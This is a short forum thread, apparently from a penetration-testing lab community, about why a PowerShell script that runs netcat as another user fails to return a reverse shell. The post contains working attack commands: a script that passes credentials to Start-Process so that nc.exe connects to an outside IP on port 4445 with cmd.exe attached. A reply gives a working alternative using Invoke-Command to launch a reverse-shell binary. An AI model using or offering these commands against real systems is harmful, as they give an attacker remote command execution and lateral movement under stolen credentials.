Reverse shell using powershell/nc as other user

I’m puzzled as why this wouldn’t work on a Windows server, I have tested this locally and it works. Any hint as why it would fail silently? (Returns to prompt after executing as powershell.exe -ExecutionPolicy Bypass -File .\revshell.ps1):

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential

If I put the wrong user/pass I’ll get a powershell error. This just never sticks for some reason, and I get 0 ping back on my local 4445 listener.

nc.exe is obviously in the same directory as the script and I am executing the script from the same directory. I have used nc.exe directly to spawn a reverse shell (without using powershell) successfully as well.

sometimes when it doesn’t work this does:

Invoke-Command -ScriptBlock {revshell.exe 10.10.x.x 4445} -Credential $cred -computername localhost

no idea why tho

Oh yeh, that worked, thanks @BrunonDEV. Windows is such a mystical operating system. If anyone knowswhy the latter works while the other doesn’t…